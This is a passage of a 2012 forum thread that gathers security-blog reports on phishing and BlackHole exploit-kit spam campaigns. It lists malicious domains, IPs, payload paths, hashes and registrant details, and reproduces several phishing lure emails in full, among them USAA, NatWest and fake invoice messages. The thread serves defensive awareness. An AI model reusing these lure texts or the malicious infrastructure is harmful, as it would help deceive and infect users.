103.6.238.9 (Universiti Putra, Malaysia)
203.80.16.81 (MYREN, Malaysia) ..."
___
Something evil on 31.193.12.3
- http://blog.dynamoo.com/2012/11/something-evil-on-31193123.html
4 Nov 2012 - "These are fake AVs and drive-by downloads mostly, some seem to be promoted through low-grade banner ads, all hosted on 31.193.12.3 (Burstnet, UK**) and suballocated to:
person: Olexii Kovalenko
address: Pavlova, 15, Zaporozhye, Zaporozhye, 69000, Ua
phone: +1 570 343 2200
fax-no: +1 570 343 9533
nic-hdl: OK2455-RIPE
source: RIPE # Filtered
mnt-by: mnt-burst-au
mnt-by: mnt-burst-mu
The registration for the .asia and .eu domains is consistent in the ones I have checked:
Registrant ID:DI_23063626
Registrant Name: Javier
Registrant Organization: n/a
Registrant Address: Nevskaya street 41
Registrant Address2:
Registrant Address3:
Registrant City: Belgorad
Registrant State/Province: Belgorodskaya oblast
Registrant Country/Economy: RU
Registrant Postal Code:494980
Registrant Phone:+007.9487728744
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant E-mail:007uyfo007 @mail .ru
... I've broken the list into three parts, it's a bit messy sorry... this long list (too long to post here) contains other detected domains on the same IP. Frankly, blocking the IP address is the most easy option.. there are actually more domains than listed here and some are duplicated, but it's the best I could do at the moment. Many of these domains show as evil in Google's Safe Browsing Diagnostics (example*) and I can find -zero- legitimate domains on this IP..."
* https://www.google.com/safebrowsing/diagnostic?site=acutefile.asia
** https://www.google.com/safebrowsing/diagnostic?site=AS:29550
** https://www.google.com/safebrowsing/diagnostic?site=AS:51377
___
Fake statistics domains lead to malware
- http://blog.dynamoo.com/2012/11/fake-statistics-domains-lead-to-malware.html
5 Nov 2012 - "The following fake "statistics" domains lead to malware. All have been registered very recently in the past few days and are used as a redirector to other exploit kits. Perhaps they are actually performing black hat statistical tracking. Blocking them (or the associated IPs) would be wise.
(see the URL above - long list of domains)
Hosting IPs:
31.193.133.212 (Simply Transit, UK)
91.186.19.42 (Simply Transit, UK)
95.211.180.143 (Leaseweb, Netherlands) ..."
___
Dynamic DNS sites you might want to block
- http://blog.dynamoo.com/2012/11/dynamic-dns-sites-you-might-want-to.html
5 Nov 2012 - "These domains belong to ChangeIP .com, which I guess is a legitimate company providing Dynamic DNS services, but one that is being abused by the bad guys. These will be used with some random subdomain unless it's a corporate site (like ChangeIP .com itself) pointing to a random IP address somewhere.. so blocking IPs won't work here.
There are two versions of this list, one links through to the Google Safe Browsing diagnostics report in case you want to review them on a case-by-case basis before blocking them. The second one is a plain list of everything in case you want to block them completely. You might notice one of the domains is called b0tnet .com which is a peculiar name for a legitimate business to register..."
(More detail at the URL above.)
:mad::mad::mad:
AplusWebMaster
2012-11-06, 15:11
FYI...
Bogus USPS emails lead to malware
- http://blog.webroot.com/2012/11/06/usps-postal-notification-themed-emails-lead-to-malware/
Nov 6, 2012 - "... mass mailing millions of emails impersonating The United States Postal Service (USPS), in an attempt to trick its customers into downloading and executing the malicious .zip archive linked in the bogus emails. Upon execution, the malware opens a backdoor on the affected host, allowing the cybercriminals behind the campaign to gain complete control over the host...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/usps_email_spam_malware.jpg
Spamvertised compromised URL: hxxp ://www .unser-revier-bruchtorf-ost .de/FWUJKKOGMP.html
Actual malicious archive URL: hxxp ://www .unser-revier-bruchtorf-ost .de/Shipping_Label_USPS.zip
Detection rate: MD5: 089605f20e02fe86b6719e0949c8f363 * ... UDS:DangerousObject.Multi.Generic
Upon execution, the sample phones back to the following URLs...
(See the 1st webroot URL above - long list of IPs.) ... 64.151.87.152, 66.7.209.185, 173.224.211.194, 46.105.121.86, 222.255.237.132, 64.151.87.152, 79.170.89.209, 217.160.236.108, 88.84.137.174, 46.105.112.99, 50.22.136.150, 130.88.105.45, 91.205.63.194, 95.173.180.42, 217.160.236.108 ..."
* https://www.virustotal.com/file/372b436a2ffb66b9f7a45d172320e0c1298d24a877d17877118647a04af6814e/analysis/1351876562/
File name: Shipping_Label_USPS.exe
Detection ratio: 5/44
Analysis date: 2012-11-02
___
SMS SPAM: "Records passed to us show you're entitled to a refund approximately £2130"
- http://blog.dynamoo.com/2012/11/sms-spam-records-passed-to-us-show.html
6 Nov 2012 - "More SMS spam from.. well, I think the ICO will shortly reveal who. It's not just a spam, but it's also a scam because the spammers are attempting to persuade you to make fraudulent claims. Not everyone is eligible for a PPI refund, and I'm certainly not.. no "records" exist, it's just a scammy sales pitch. Avoid.
Records passed to us show you're entitled to a refund approximately £2130 in compensation from mis-selling of PPI on your credit card or loan.Reply INFO or stop
In this case, the sender's number is +447585858897, although it will change as it gets blocked by the networks. If you get one of these, you should forward the spam and the sender's number to your carrier. In the case of T-Mobile, O2 and Orange the number to report to is 7726 ("SPAM"). Vodafone customers should use 87726 ("VSPAM") and Three customers should use 37726 ("3SPAM"). Hopefully the carriers will act if there are enough complaints."
___
Fake Apple "Account Info Change" SPAM / welnessmedical .com
- http://blog.dynamoo.com/2012/11/apple-account-info-change-spam.html
6 Nov 2012 - "Not malware this time, but Pharma spam.. the links in this fake Apple message lead to welnessmedical .com.
From: Apple [ appleid @ id.arcadiadesign .it]
Sent: Tue 06/11/2012 18:30
Subject: Account Info Change
Hello,
The following information for your Apple ID [redacted] was updated on 11/06/2012:
Date of birth
Security question(s) and answer(s)
If these changes were made in error, or if you believe an unauthorized person accessed your account, please reset your account password immediately by going to iforgot.apple.com.
To review and update your security settings, sign in to appleid.apple.com.
This is an automated message. Please do not reply to this email. If you need additional help, visit Apple Support.
Thanks,
Apple Customer Support
TM and copyright © 2012 Apple Inc. 1 Infinite Loop, MS 96-DM, Cupertino, CA 95014.
All Rights Reserved / Keep Informed / Privacy Policy / My Apple ID
The fake pharma site (welnessmedical.com) is hosted on 84.22.127.43 along with a bunch of other ones, plus some additional sites one IP over at 84.22.127.44... Oddly, 84.22.127.43 doesn't seem to be registered at RIPE. No matter, we know who the owner of 84.22.127.0 is.. our old friends Cyberbunker again, who have registered the block with fake details. How RIPE lets them get away with this I don't know. If you can, I recommend blocking the entire 84.22.96.0/19 range as almost everything here is pretty seedy. You can read more about Cyberbunker's very dark grey hat activities over at Wikipedia* if you want more information."
* http://en.wikipedia.org/wiki/CyberBunker
___
Fake "Scan from a Xerox WorkCentre Pro" / peneloipin .ru
- http://blog.dynamoo.com/2012/11/scan-from-xerox-workcentre-pro.html
6 Nov 2012 - "This fake printer spam leads to malware on peneloipin .ru:
From: Keshawn Burns - MaribelParchment @ hotmail .com
Sent: 06 November 2012 05:09
Subject: Scan from a Xerox WorkCentre Pro #47938830
Please open the attached document. It was scanned and sent
to you using a Xerox WorkCentre Pro.
Sent by: Keshawn
Number of Images: 5
Attachment File Type: .HTML [Internet Explorer file]
Xerox WorkCentre Location: machine location not set
The attachment contains some obfuscated Javascript that redirects the visitor to a malicious payload on [donotclick]peneloipin .ru:8080/forum/links/column.php hosted on some IPs that have been used several times before for malware:
65.99.223.24 (RimuHosting, US)
103.6.238.9 (Universiti Putra, Malaysia)
203.80.16.81 (MYREN, Malaysia)
The following malicious domains are also hosted on the same servers:
(see the URL above - long list of domains) ..."
:mad:
AplusWebMaster
2012-11-07, 13:13
FYI...
Fake ‘Fwd: Scan from a Xerox W. Pro’ emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/11/07/fwd-scan-from-a-xerox-w-pro-themed-emails-lead-to-black-hole-exploit-kit/
Nov 7, 2012 - "... malicious cybercriminals spamvertise millions of emails attempting to trick end users into thinking that they’ve received a scanned document. Upon clicking on the links found in these emails, or viewing the malicious .html attachment, users are automatically exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit... The first is mimicking a Xerox Pro printer, and the second is claiming to be a legitimate Wire Transfer. Both of these campaigns point to the same client-side exploits serving URL, indicating that they’ve been launched by the same cybercriminal/gang of cybercriminals.
Sample screenshots of the spamvertised emails:
> https://webrootblog.files.wordpress.com/2012/11/xerox_email_spam_exploits_malware.png
> https://webrootblog.files.wordpress.com/2012/11/xerox_email_spam_exploits_malware_01.png
... sample javascript obfuscation: MD5: 0a8a06770836493a67ea2e9a1af844bf * ... Mal/JSRedir-M
... dropped malware: MD5: 194655f7368438ab01e80b35a5293875 ** ... Trojan-Ransom.Win32.PornoAsset.avzz
panalkinew .ru responds to the following IPs – 203.80.16.81, AS24514; 209.51.221.247, AS10297; 213.251.171.30, AS16276 ..."
* https://www.virustotal.com/file/c65505c7d00e01f0afed0e35949af275c0ed50208640000a2c612be19471ea40/analysis/
File name: Scan_N13004.htm
Detection ratio: 24/44
Analysis date: 2012-11-05
** https://www.virustotal.com/file/f8aa0ca5b78e08bec43cf32cfdebd205c984089aea6a8eae992ebaccc5275ed8/analysis/
File name: d34c2e80562a36fb762be72e490b7793887c3192
Detection ratio: 25/43
Analysis date: 2012-11-01
___
Fake Intercompany Invoice SPAM / controlleramo .ru
- http://blog.dynamoo.com/2012/11/intercompany-invoice-spam.html
7 Nov 2012 - "This fake invoice spam leads to malware on controlleramo .ru:
Date: Wed, 7 Nov 2012 07:29:44 -0500
From: LinkedIn [welcome@linkedin.com]
Subject: Re: Intercompany inv. from Beazer Homes USA Corp.
Attachments: Invoice_e49580.htm
Hi
Attached the corp. invoice for the period July 2012 til Aug. 2012.(Internet Explorer file)
Thanks a lot for supporting this process
Rihanna PEASE
Beazer Homes USA Corp.
The attachment contains obfuscated Javascript that attempts to direct the visitor to a malicious payload at [donotclick]controlleramo .ru:8080/forum/links/column.php hosted on:
103.6.238.9 (Universiti Putra, Malaysia)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNet, US)
These IP addresses have been used in several attacks recently, and you should block access to them if you can."
___
Phishers take aim at USAA
- http://www.gfi.com/blog/phishers-take-aim-at-usaa/
Nov 7, 2012 - "Customers of the United Services Automobile Association, or USAA, are confronted with a faceless threat and may likely find themselves within enemy territory... if they’re not careful enough. Our researchers in the AV Labs spotted a phishing attack aimed at USAA customers who are mainly military service members, veterans and their families. The attack starts with the following spam:
> http://www.gfi.com/blog/wp-content/uploads/2012/11/USAACred_115.png
From: {random}
To: {random}
Subject: USAA – Account Security Update
Message body:
Dear Valued Customer,
We detected irregular activities on your USAA Internet Banking account. Your Internet banking account has been temporarily suspended for your protection, you must verify this activity before you can continue using your Internet banking account with USAA Bank.
Please follow the reference link below to verify your account.
Click here to verify
Security advice : Always log-off completely your Internet banking account after using internet banking from a public places or computer for security reasons.
Thank you,
USAA Internet Banking.
Once a recipient clicks Click here to verify, he/she is then taken to a legitimate-looking USAA login page... take note of the URL:
> http://www.gfi.com/blog/wp-content/uploads/2012/11/usaa011.png
This phishing page asks for a member’s Online ID, password and the PIN number of their USAA-issued credit or debit card, which the phishers made a compulsory detail to add on the login page. Note, however, that the actual USAA login page* does -not- ask for their members’ PINs. PIN numbers can personally identify individuals and their owners must only have sole knowledge of them. Members must never disclose them to any service provider or individual. Likewise, service providers must never ask for them (as proof of membership) nor store them in any form. Private citizens are also not safe from this phishing attack. Although USAA caters more to the military folks and their families, USAA has made available its online banking service to anyone, locally and internationally. USAA clients should be aware that phishing attacks are happening not just to online banking and e-commerce sites but also to financial services and insurance companies. We advise recipients of the phishing email to -delete- it from their inboxes..."
* https://www.usaa.com/inet/ent_logon/Logon
>> https://www.usaa.com/inet/pages/advice_12_common_scams?SearchRanking=6&SearchLinkPhrase=phishing%20email
>>> https://www.youtube.com/watch?feature=player_embedded&v=KYiKATvQvWw#!
:fear::mad:
AplusWebMaster
2012-11-08, 14:23
FYI...
Fake Discover Card emails serve client-side exploits and malware
- http://blog.webroot.com/2012/11/08/your-discover-card-services-blockaded-themed-emails-serve-client-side-exploits-and-malware/
8 Nov 2012 - "Cybercriminals are currently spamvertising millions of emails impersonating Discover, in an attempt to trick cardholders into clicking on the client-side exploits serving URLs found in the malicious emails. Upon clicking on the links, users are exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit.
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/discover_email_spam_exploits_malware.png
... Sample detection rate for the dropped malware: MD5: 80601551f1c83ee326b3094e468c6b42 * ... UDS:DangerousObject.Multi.Generic
Upon execution, the sample phones back to 200.169.13.84 :8080/AJtw/UCyqrDAA/Ud+asDAA, AS21574
Client-side exploits serving domain reconnaissance:
teamscapabilitieswhich.org responds to 183.180.134.217, AS2519 – Email: anil_valiquette124 @ dawnsonmail .com
Name Server: NS1.CHELSEAFUN.NET – 173.234.9.89
Name Server: NS2.CHELSEAFUN.NET – 65.131.100.90
netgear-india .net – 183.180.134.217, AS2519
Name Server: NS1.TOPPAUDIO .COM - 91.216.93.61
Name Server: NS2.TOPPAUDIO .COM - 173.234.9.89 ..."
* https://www.virustotal.com/file/44c36b250355195a4ebf1abccc7ac15c76f700e323fbd7e86d3bc4f04ea50589/analysis/
File name: KB01474670.exe
Detection ratio: 4/44
Analysis date: 2012-11-02
___
getyourbet .org injection attack
- http://blog.dynamoo.com/2012/11/getyourbetorg-injection-attack.html
8 Nov 2012 - "There seems to be an injection attack doing the rounds; the injected domain is getyourbet .org, hosted on 31.184.192.237. The domain registration details are:
Registrant ID:TOD-42842658
Registrant Name:ChinSec
Registrant Organization:ChinSec
Registrant Street1:Beijing
Registrant Street2:
Registrant Street3:
Registrant City:Beijing
Registrant State/Province:BJ
Registrant Postal Code:519000
Registrant Country:CN
Registrant Phone:+86.5264337745
Registrant Phone Ext.:
Registrant FAX:+86.5264337745
Registrant FAX Ext.:
Registrant Email:chinseccdomains @ yahoo .com
The domain was created on 12th October. The IP address is in Russia (PIN-DEDICATEDSERVERS-NET).
This is a two-stage attack: if getyourbet .org is called with the correct referrer parameters, the victim ends up at another server at 64.202.123.3 (Hostforweb, US) that tries to serve up a malicious payload. This server contains a bunch of subdomains from a hacked GoDaddy account.
I've seen this sort of abuse of GoDaddy domains before: the main "www" domain resolves OK, but the subdomains get pointed elsewhere. There's either a problem with GoDaddy or this is done through a phish.
Anyway, block 64.202.123.3 and 31.184.192.237 if you can to prevent further attacks."
:mad:
AplusWebMaster
2012-11-09, 15:09
FYI...
Fake Intuit emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/11/09/payroll-account-holded-by-intuit-themed-emails-lead-to-black-hole-exploit-kit/
Nov 9, 2012 - "Intuit users, beware! Cybercriminals are currently mass mailing millions of emails impersonating Intuit’s Direct Deposit Service, in an attempt to trick its users into clicking on the malicious links found in the legitimate-looking emails. Upon clicking on -any- of them, users are exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/intuit_spam_email_exploits_malware.png
... Detection rate for the dropped malware: MD5: ebe81fe9a632726cb174043f6ac93e46 * ... Trojan.Win32.Bublik.qqf
Client-side exploits serving domain reconnaissance:
savedordercommunicates .info – 75.127.15.39, AS36352 – Email: heike_ruigrok32 @ naplesnews .net
Name Server: NS1.CHELSEAFUN .NET – 173.234.9.89, AS15003 – also responding to the same IP is the following malicious name server: ns1.nationalwinemak .com
Name Server: NS2.CHELSEAFUN .NET – 65.131.100.90, AS209
We’ve already seen the -same- name servers used in the previously profiled “‘Your Discover Card Services Blockaded’ themed emails serve client-side exploits and malware” malicious campaign, indicating that both of these campaigns are managed by the same malicious party.
Responding to the same IP (75.127.15.39) is also the following malicious domain:
teamscapabilitieswhich .org..."
* https://www.virustotal.com/file/4619216c7a5168b2a3ccc048ac0a53b94bccc787574dd3929770d99c279c1e14/analysis/
File name: download
Detection ratio: 29/44
Analysis date: 2012-11-08
___
Changelog SPAM / canadianpanakota .ru
- http://blog.dynamoo.com/2012/11/changelog-spam-canadianpanakotaru.html
9 Nov 2012 - "This spam leads to malware on canadianpanakota .ru:
Date: Fri, 9 Nov 2012 11:55:11 +0530
From: LinkedIn Password [password @ linkedin .com]
Subject: Re: Changlog 10.2011
Attachments: changelog4-2012.htm
Hello,
as promised changelog,(Internet Explorer File)
The attachment leads to a malicious payload at [donotclick]canadianpanakota .ru :8080/forum/links/column.php hosted on the following IPs:
120.138.20.54 (SiteHost, New Zealand)
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
These IPs will probably be used in other attacks; blocking access to them now might be prudent. The following IPs and domains are all related..."
:mad:
AplusWebMaster
2012-11-12, 13:21
FYI...
Fake American Express emails serve client-side exploits and malware...
- http://blog.webroot.com/2012/11/12/american-express-alert-your-transaction-is-aborted-themed-emails-serve-client-side-exploits-and-malware/
Nov 12, 2012 - "American Express cardholders, beware! Over the past week, cybercriminals mass mailed millions of emails impersonating American Express, in an attempt to trick its customers into clicking on the malicious links found in the emails. Upon clicking on any of the links, users are redirected to a malicious URL serving client-side exploits courtesy of the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/american_express_email_exploits_malware.png
... Malicious domain name reconnaissance:
stempare .net – 109.123.220.145, AS15685 – Email: rebe_bringhurst1228 @ i-connect .com
Name Server: NS1.TOPPAUDIO .COM – 91.216.93.61, AS50300 – Email: windowclouse @ hotmail .com
Name Server: NS2.TOPPAUDIO .COM – 29.217.45.138 – Email: windowclouse @ hotmail .com ...
Upon loading of the malicious URL, a malicious PDF file exploiting CVE-2010-0188 is used to ultimately drop the actual payload – MD5: c8c607bc630ee2fe6a8c31b8eb03ed43 * ... Trojan.Win32.Bublik.ptf...
Upon execution, the dropped malware requests a connection to 192.5.5.241 :8080 and then establishes a connection with 210.56.23.100 :8080/Ajtw/UCygrDAA/Ud+asDAA (AS7590, Commission For Science And Technology, Pakistan). The following domain responds to this IP: discozdata .org. It is currently blacklisted in 25 anti-spam lists. The following URLs are known to have (been) directly serving malicious content, and act as command and control servers in the past:
210.56.23.100 :8080/asp/intro.php
210.56.23.100 :8080/za/v_01_a/in ...
The last time we came across this IP (210.56.23.100), was in July 2012's analysis of yet another malicious campaign, this time impersonating American Airlines..."
* https://www.virustotal.com/file/06afca28452c39cacc7791f89c70f97bf948e271520a6b893c75ad3abf0c6182/analysis/
File name: c8c607bc630ee2fe6a8c31b8eb03ed43
Detection ratio: 15/43
Analysis date: 2012-11-02
___
Cableforum.co .uk hacked?
- http://blog.dynamoo.com/2012/11/cableforumcouk-hacked.html
12 Nov 2012 - "Cableforum.co .uk is a popular and useful UK site about digital TV and broadband. Unfortunately, the email address list has leaked out and is being used for spamming, for example:
NatWest : Helpful Banking
Dear Valued Member ;
To prevent unauthorized access to your accounts, your online service has been temporarily locked. No further log in attempts will be accepted.
This is a procedure that automatically occur when an invalid information is submitted during the log in process.
Please follow the provided steps below to confirm your identity
and restore your online access...
> https://lh3.ggpht.com/-v0aFooReF9M/UKD3p5kUNjI/AAAAAAAAAxY/oFfCiZV5IR4/s1600/natwest.png
This is a standard NatWest phish. It doesn't originate from Cableforum.co.uk or its servers, but it is sent to an address ONLY used for Cableforum, so it must have leaked out somehow... Sadly, crap like this happens to good websites... Clearly there has been a problem for several months, although it isn't clear when such an address leak occurred or what data was taken with it. You should always assume that the passwords have been compromised and change it, plus change it anywhere that you re-use the same password."
:mad:
AplusWebMaster
2012-11-12, 22:28
FYI...
Blackhole exploit kit - top threat by a large margin
- https://blogs.technet.com/b/security/archive/2012/11/12/blackhole-exploit-kit-activity-peaks-as-exploit-activity-on-the-internet-reaches-new-heights.aspx
12 Nov 2012 - "... exploit activity has increased substantially over the past year... large increases in HTML/JavaScript exploit activity and Oracle Java exploit activity are major contributors to this trend... the top threat family driving these detections is Blacole, also known as the “Blackhole” exploit kit. Blacole, a family of exploits used by the so-called Blackhole exploit kit to deliver malicious software through infected webpages, was the most commonly detected exploit family in the first half of 2012 by a large margin*. This kit can be bought or rented on hacker forums and through other illegitimate outlets. The kit consists of a collection of malicious webpages that contain exploits for vulnerabilities in versions of Adobe Flash Player, Adobe Reader, Microsoft Data Access Components (MDAC), the Oracle Java Runtime Environment (JRE), and other popular products and components** ... In years past it was rare to see an exploit in the top ten list of threats for a country/region. In 2012-Q2 at least one exploit was in the top ten list of threats for 51 locations of the 105 countries/regions (49%) reported on in SIRv13***. Blacole is in the top ten lists of twenty-seven of these locations ..."
* https://blogs.technet.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-50-43/3683.2.jpg
** https://blogs.technet.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-50-43/6443.1.jpg
*** http://www.microsoft.com/security/sir/threat/default.aspx
___
New Java attack introduced into "Cool Exploit Kit"
- https://threatpost.com/en_us/blogs/new-java-attack-introduced-cool-exploit-kit-111212
Nov 12, 2012 - "A new exploit has been found in the Cool Exploit Kit for a vulnerability* in Java 7 Update 7 as well as older versions, a flaw that’s been patched by Oracle in Java 7 Update 9. Cool Exploit Kit was discovered last month and is largely responsible for dropping the Reveton ransomware. A new Metasploit module was introduced last night by researcher Juan Vazquez, developer Eric Romang said. Romang, a frequent Metasploit contributor, suggested it’s likely the exploit has been in the wild for a period of time and has only now been integrated into an exploit kit... Researchers are concerned now that this exploit is in Cool Exploit Kit, it could find its way into the BlackHole Exploit Kit... Reveton is linked to the Citadel banking and botnet malware..."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5076 - 10.0 (HIGH)
:mad::mad:
AplusWebMaster
2012-11-13, 17:40
FYI...
Fake "Your flight" SPAM / monacofrm .ru
- http://blog.dynamoo.com/2012/11/your-flight-spam-monacofrmru.html
13 Nov 2012 - "These spam email messages lead to malware on monacofrm .ru:
From: sales1 @victimdomain .com
Sent: 13 November 2012 04:04
Subject: Fwd: Your Flight A874-64581
Dear Customer,
FLIGHT NR: 1173-8627
DATE/TIME : JAN 27, 2013, 19:15 PM
ARRIVING AIRPORT: SAN-DIEGO AIRPORT
PRICE : 520.40 USD
Your bought ticket is attached to the letter as a scan document .
To use your ticket you should print it.
NAOMI PATTON,
==========
From: messages-noreply @bounce .linkedin .com On Behalf Of LinkedIn
Sent: 13 November 2012 05:18
Subject: Re: Fwd: Your Flight A943-6733
Dear Customer,
FLIGHT NR: 360-6116
DATE/TIME : JAN 26, 2013, 14:12 PM
ARRIVING AIRPORT: SAN-DIEGO AIRPORT
PRICE : 997.25 USD
Your bought ticket is attached to the letter as a scan document .
To use your ticket you should print it.
Adon Walton,
(...etc.)
The malicious payload is at [donotclick]monacofrm.ru:8080/forum/links/column.php hosted on the following IPs:
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
216.24.194.66 (Psychz Networks, US)
The Mongolian and Malaysian IPs have been used several times for malware attacks; 216.24.194.66 looks like a new one. Blocking them all would probably be prudent.
Added: There's a Wire Transfer SPAM using the same payload too:
From: Amazon.com / account-update @amazon .com
Sent: 13 November 2012 08:08
Subject: Fwd: Re: Wire Transfer Confirmation
Dear Bank Account Operator,
WIRE TRANSFER: FED8979402863338715
CURRENT STATUS: PENDING
Please REVIEW YOUR TRANSACTION as soon as possible.
___
Fake "End of Aug. Statmeent" SPAM / veneziolo .ru
- http://blog.dynamoo.com/2012/11/end-of-aug-statmeent-spam-venezioloru.html
13 Nov 2012 - "The spam never stops, this malicious email leads to malware at veneziolo .ru:
Date: Tue, 13 Nov 2012 12:27:15 -0500
From: Mathilda Allen via LinkedIn [member @linkedin .com]
Subject: Re: End of Aug. Statmeent required
Attachments: Invoices12-2012.htm
Good morning,
as reqeusted I give you inovices issued to you per sept. (Internet Explorer format)
Regards
The malicious payload is at [donotclick]veneziolo .ru:8080/forum/links/column.php, hosted on the same IPs seen earlier today; the following IPs and domains are all related:
41.168.5.140, 62.76.46.195, 62.76.178.233, 62.76.186.190, 62.76.188.246, 65.99.223.24, 84.22.100.108, 85.143.166.170, 87.120.41.155, 91.194.122.8, 103.6.238.9, 120.138.20.54, 132.248.49.112, 202.180.221.186,
203.80.16.81, 207.126.57.208, 209.51.221.247, 213.251.171.30, 216.24.194.66 ..."
:mad::mad:
AplusWebMaster
2012-11-14, 14:54
FYI...
Fake ‘PayPal Account Modified’ emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/11/14/paypal-account-modified-themed-emails-lead-to-black-hole-exploit-kit/
Nov 14, 2012 - "A cybercriminal/group... continues to systematically rotate the impersonated brands and the actual malicious payload dropped by the market leading Black Hole Exploit Kit. The prospective target of their latest campaign? PayPal users...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/paypal_email_spam_exploits_malware.png
... Malicious domain name reconnaissance: puzzledbased .net – 183.180.134.217, AS2519 – Email: rodger_covach3060 @ spacewar .com
Name Server: NS1.TOPPAUDIO .COM
Name Server: NS2.TOPPAUDIO .COM
Although we couldn’t reproduce puzzledbased .net’s malicious activity, we know for certain that on 2012/11/01 at 15:19, hxxp ://netgear-india .net/detects/discover-important_message.php was responding to the same IP. We’ve already seen and profiled the malicious activity of the campaign using this URL in the “‘Your Discover Card Services Blockaded’ themed emails serve client-side exploits and malware analysis...
The following malicious domains are also part of the campaign’s infrastructure and respond to the same IP (183.180.134.217) as the client-side exploits serving domains...
The following malicious domain (stempare .net) was also seen in the recently profiled “‘American Express Alert: Your Transaction is Aborted’ themed emails serve client-side exploits and malware” campaign, indicating yet another connection between these campaigns..."
___
promotesmetasearch .net promotes malware
From the WeAreSpammers blog: http://wearespammers.blogspot.co.uk/2012/11/launch-of.html
- http://blog.dynamoo.com/2012/11/promotesmetasearchnet-promotes-malware.html
14 Nov 2012 - "This looks like a fake get-rich-quick scam email which is actually intended to distribute malware. Originating IP is 5.39.101.233 (OVH, Germany). Spamvertised domains are 8mailer .com on 5.39.101.225 (OVH, Germany) and promotesmetasearch .net on 46.249.38.27 (Serverius Holding, Netherlands). This last one is kind of interesting, because 1) it's all in French and 2) it contains a virus. The malware attempts to download an exploit kit from [donotclick]vodkkaredbuuull .chickenkiller .com/trm/requesting/requesting-pass_been_loaded.php which is kind of unfriendly, hosted on the same IP address.
The WHOIS details show a completely different name and address from the one quoted on the email:
Florence Buker
florence_buker05 @rockfan .com
7043 W Avenue A4
93536 Lancaster
United States
Tel: +1.4219588211
Clearly the owner of promotemetasearch .net is up to no good, and I would suggest the Anthony Tomei connection might well be completely bogus.
From: Anthony Tomei admin @8 mailer .com
Reply-To: info @ promotesmetasearch .net
To: donotemail @ wearespammers .com
Date: 14 November 2012 18:22
Subject: launch of
Dear Future Millionaire,
Making $100,000 per month is not hard. In fact, there are 2 ways you accomplish this easy task of making money in a short period of time.
The first way is to...
Anthony Tomei is an Expert Internet Network Marketer. Anthony is known as the Master Marketer and practically gives away all of his secrets, methods and marketing techniques... You should probably regard the domain chickenkiller .com as compromised and block it. Additionally, all the following IPs and domains are related and are probably malicious..."
:mad:
AplusWebMaster
2012-11-15, 13:56
FYI...
Opera site served Blackhole malvertising...
- http://www.theregister.co.uk/2012/11/15/opera_blackhole/
15 Nov 2012 - "Opera has suspended ad-serving on its portal as a precaution while it investigates reports that surfers were being exposed to malware simply by visiting the Norwegian browser firm's home page. Malicious scripts loaded by portal .opera .com were redirecting users towards a malicious site hosting the notorious BlackHole exploit kit, said Romanian anti-virus firm BitDefender*, which said it had detected the apparent attack on its automated systems. BitDefender said it promptly warned Opera after it detected the problem on Wednesday. It seems likely the scripts had been loaded through a third-party advertisement, a practice commonly known as malvertising. Opera has yet to confirm the problem, but has disabled advertising scripts on its portal in case they are tainted..."
* http://www.hotforsecurity.com/blog/opera-users-exposed-to-blackhole-through-browser-homepage-4431.html
14 Nov 2012 - "... malicious page harbors the BlackHole exploit kit (we got served with the sample via a PDF file rigged with the CVE-2010-0188 exploit) that will infect the unlucky user with a freshly-compiled variant of ZBot, detected by Bitdefender as Trojan.Zbot.HXT. The ZBot malware is on a server in Russia which, most probably, has also fallen victim to a hacking attack, allowing unauthorized access via FTP..."
> http://www.hotforsecurity.com/wp-content/uploads/2012/11/Opera-Users-Exposed-to-BlackHole-through-Browser-Homepage-21.jpg
- http://www.h-online.com/security/news/item/Opera-s-web-portal-reportedly-deployed-online-banking-trojan-1751410.html?view=zoom;zoom=3
16 Nov 2012
___
Bogus BBB emails serve client-side exploits and malware
- http://blog.webroot.com/2012/11/15/bogus-better-business-bureau-themed-notifications-serve-client-side-exploits-and-malware/
Nov 15, 2012 - "Cybercriminals are currently spamvertising millions of emails impersonating the Better Business Bureau (BBB), in an attempt to trick users into clicking on a link to a non-existent report. Upon clicking on the link, users are exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/better_business_bureau_email_spam_exploits_malware.png
... Although I wasn’t able to obtain the actual malicious payload from this campaign, it’s worth pointing out that the cybercriminals behind it relied on the same infrastructure as they did in previously profiled malicious attacks launched by the same party. We also know that on the following dates/specific time, the following malicious URLs also responded to the same IP (183.81.133.121):
2012-10-16 00:24:08 – hxxp ://navisiteseparation .net/detects/processing-details_requested.php
2012-10-12 11:19:37 – hxxp ://editdvsyourself .net/detects/beeweek_status-check.php
Responding to the same IP (183.81.133.121) are also the following malicious domains:
stafffire .net
hotsecrete .net - Email: counseling1 @ yahoo .com
the-mesgate .net - also responds to 208.91.197.54 – Email: admin @ newvcorp .com
Name servers used in the campaign:
Name Server: NS1.TOPPAUDIO .COM - 91.216.93.61 – Email: windowclouse @ hotmail .com
Name Server: NS2.TOPPAUDIO .COM - 29.217.45.138 – Email: windowclouse @ hotmail .com ..."
___
Changelog SPAM / feronialopam .ru
- http://blog.dynamoo.com/2012/11/changelog-spam-feronialopamru.html
15 Nov 2012 - "This fake "Changelog" spam leads to malware on feronialopam .ru:
Date: Thu, 15 Nov 2012 10:43:59 +0300
From: "Xanga" [noreply@xanga.com]
Subject: Re: Changelog 2011 update
Attachments: changelog-12.htm
Hello,
